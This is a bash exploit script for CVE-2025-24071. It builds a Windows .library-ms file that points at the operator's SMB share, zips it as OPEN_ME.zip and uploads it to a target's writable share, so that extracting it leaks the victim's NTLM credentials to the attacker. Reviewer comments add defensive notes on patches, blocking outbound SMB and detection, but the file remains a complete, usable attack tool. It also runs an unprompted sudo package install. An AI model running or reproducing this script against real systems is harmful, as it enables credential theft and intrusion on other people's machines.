#!/bin/bash
# CVE-2025-24071 - Windows File Spoofing Vulnerability
# By f4dee
# Requirements zip, smbclient
# Strict mode: abort on unhandled command failure, on use of an unset
# variable, and when any stage of a pipeline fails.
set -o errexit -o nounset -o pipefail

# ANSI colour escape sequences. They are stored as literal backslash text and
# only turned into control bytes later, by the `echo -e` calls that print them.
endColour='\033[0m\e[0m'
redColour='\e[0;31m\033[1m'
greenColour='\e[0;32m\033[1m'
yellowColour='\e[0;33m\033[1m'
blueColour='\e[0;34m\033[1m'
purpleColour='\e[0;35m\033[1m'
turquoiseColour='\e[0;36m\033[1m'
grayColour='\e[0;37m\033[1m'
# Dependency check: the script needs both `zip` and `smbclient` on PATH.
# NOTE(review): when either tool is missing this goes straight to a root
# package installation through sudo/apt with -y, without asking the operator
# and without checking that the host is apt-based. Anyone running this file
# should read that line first; printing the missing tool and exiting would be
# the more conservative behaviour.
missing_tool=0
for required_tool in zip smbclient; do
  if [ ! -x "$(command -v "$required_tool")" ]; then
    missing_tool=1
    break
  fi
done

if [ "$missing_tool" -eq 1 ]; then
  echo "[!] Missing requirements. Installing zip and smbclient..."
  sudo apt install zip smbclient -y
fi
# SIGINT handler: prints an exit notice, makes the terminal cursor visible
# again, deletes the two working files from the current directory if they
# exist, and terminates the script with status 1.
ctrl_c() {
  echo -e "\n\n${redColour}[!] Exiting...${endColour}\n"
  tput cnorm
  rm -f pwn3d.library-ms OPEN_ME.zip
  exit 1
}

# Run the handler when the operator presses Ctrl+C.
trap ctrl_c INT
# Prints the coloured usage line followed by one description row per option.
# Writes to stdout only; the caller decides whether to exit afterwards.
helpPanel() {
  local usage_line row
  # Each entry is "<flag> <description>"; the first space separates the two.
  local -a rows=(
    "-i) Your IP address"
    "-t) Target IP"
    "-d) A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) "
    "-u) Username"
    "-p) Password"
    "-h) Display this help panel"
  )

  usage_line="\n${yellowColour}[+]${endColour}${grayColour} Usage:${endColour}${blueColour} $0${endColour}"
  usage_line+="${greenColour} -i${endColour}${yellowColour} 'YOUR_IP'${endColour}"
  usage_line+="${greenColour} -t${endColour}${yellowColour} 'TARGET_IP'${endColour}"
  usage_line+="${greenColour} -d${endColour}${yellowColour} 'DIRECTORY_WRITE'${endColour}"
  usage_line+=" ${greenColour}-u${endColour}${yellowColour} 'USER'${endColour}"
  usage_line+="${greenColour} -p${endColour}${yellowColour} 'PASSWORD'${endColour}\n"
  echo -e "$usage_line"

  for row in "${rows[@]}"; do
    echo -e "\t${turquoiseColour}${row%% *}${endColour}${grayColour} ${row#* }${endColour}"
  done
}
# exploit IP TARGET DIRECTORY USER PASSWORD
#
# Writes a Windows library description file (pwn3d.library-ms) whose only
# search-connector location is the UNC path \\IP\smbFolder, packs it into
# OPEN_ME.zip, uploads that archive to \\TARGET\DIRECTORY with smbclient using
# USER%PASSWORD, and then deletes both local files.
#
# Arguments:
#   $1 - address written into the <url> element of the library file
#   $2 - host that is pinged and that receives the upload
#   $3 - share name on that host
#   $4 - SMB user name
#   $5 - SMB password
# Globals: file, ip, target, directory, user, password and payload are assigned
#   without `local`, so they overwrite script-level variables of the same name.
# Exit status: calls `exit 1` when the ping fails or when the library file is
#   not present after being written.
#
# NOTE(review), defensive context: per the public advisory for CVE-2025-24071,
# Windows Explorer resolves the location inside a .library-ms file as soon as
# it is extracted from an archive, which makes the extracting host authenticate
# over SMB to the listed address. The controls that matter are Microsoft's
# March 2025 security updates, blocking outbound SMB (TCP 445) at the network
# edge, restricting outgoing NTLM, and alerting on .library-ms files that
# arrive inside archives or appear on file shares.
function exploit(){
file="pwn3d.library-ms"
ip="$1"
target="$2"
directory="$3"
user="$4"
password="$5"
# The triple quotes are an empty string, a normal double-quoted string and
# another empty string, so $ip is expanded and the escaped backslashes collapse
# to \\<ip>\smbFolder. $ip is placed into the XML as given, with no validation
# or escaping.
payload="""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<libraryDescription xmlns=\"http://schemas.microsoft.com/windows/2009/library\">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\$ip\\smbFolder</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>"""
# Hide the cursor while progress messages are printed; restored by the
# `tput cnorm` calls below and by the SIGINT handler.
tput civis
echo -e "\n${purpleColour}-----Welcome to CVE-2025-24071-----${endColour}\n"
echo -e "${yellowColour}[*]${endColour}${grayColour} Verifying connectivity with target host${endColour} ${yellowColour}$target...${endColour}\n"
# Reachability gate: one ICMP echo request. $target is unquoted here, so it is
# subject to word splitting and globbing.
if ping -c 1 $target &>/dev/null; then
sleep 1
echo -e "${greenColour}[+] Host $target responded successfully to ping.${endColour}\n"
# The library file is written to the current working directory.
echo "$payload" > "$file"
sleep 1
# Both messages below report the same event, and they are printed before the
# existence check that follows.
echo -e "${yellowColour}[>]${endColour}${grayColour} Library file $file created...${endColour}\n"
sleep 1
echo -e "${yellowColour}[>]${endColour}${grayColour} File created successfully $file...${endColour}\n"
sleep 1
if [ -f "$file" ]; then
zip -q OPEN_ME.zip "$file"
echo -e "${yellowColour}[>]${endColour}${grayColour} Creating ZIP file...${endColour}\n"
sleep 1
# The message names malicious.zip, but the archive that is uploaded is
# OPEN_ME.zip.
echo -e "${yellowColour}[>]${endColour}${grayColour} Uploading malicious.zip...${endColour}\n"
# The unquoted backslashes collapse to \\<target>\<directory>; $target and
# $directory are not quoted. The password is passed on smbclient's command
# line, where it is visible in the local process list, and all smbclient output
# is discarded.
# NOTE(review): the file sets `set -e` at the top, so a non-zero smbclient
# status presumably ends the script on this line, before the cleanup below and
# with the cursor still hidden - confirm.
smbclient \\\\$target\\$directory -U "$user%$password" -c "put OPEN_ME.zip" &>/dev/null
echo -e "${redColour}[!] Remove zip and pwn3d.library-ms...${endColour}\n"
# Local copies are deleted; the uploaded archive stays on the share.
rm -f OPEN_ME.zip "$file"
sleep 1
echo -e "${yellowColour}[~]${endColour}${grayColour} Payload sent successfully. Waiting :D ...${endColour}"
else
# This branch exits without restoring the cursor.
echo -e "${redColour}[!] File $file does not existing...${endColour}"
exit 1
fi
tput cnorm
else
echo -e "${redColour}[!] Host $target did not respond to ping; it may be down or unreachable.${endColour}"
tput cnorm; exit 1
fi
# Second cursor restore on the success path (already done inside the branch).
tput cnorm
}
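# Command-line handling.
#
# Options: -i IP, -t TARGET, -d SHARE, -u USER, -p PASSWORD, -h (help).
# All five value options are required. The run is refused, with the usage
# text and exit status 1, when any of them is missing or empty, when an
# unknown option is given, or when stray positional arguments remain.
#
# Each value starts as an empty string so the completeness check below works
# under `set -u` and cannot be satisfied by repeating one option five times,
# which a plain occurrence counter would accept.
ip=""
target=""
directory=""
user=""
password=""

while getopts "i:t:d:u:p:h" arg; do
  case "${arg}" in
    i) ip="${OPTARG}" ;;
    t) target="${OPTARG}" ;;
    d) directory="${OPTARG}" ;;
    u) user="${OPTARG}" ;;
    p) password="${OPTARG}" ;;
    h)
      helpPanel
      exit 0
      ;;
    *)
      helpPanel
      exit 1
      ;;
  esac
done
shift "$((OPTIND - 1))"

# Leftover positional arguments mean the invocation was malformed: show the
# usage text and stop instead of continuing with a partly understood command.
if [ "$#" -gt 0 ]; then
  helpPanel
  exit 1
fi

# Fail closed unless every required value was supplied.
if [ -z "$ip" ] || [ -z "$target" ] || [ -z "$directory" ] ||
  [ -z "$user" ] || [ -z "$password" ]; then
  helpPanel
  exit 1
fi

exploit "$ip" "$target" "$directory" "$user" "$password"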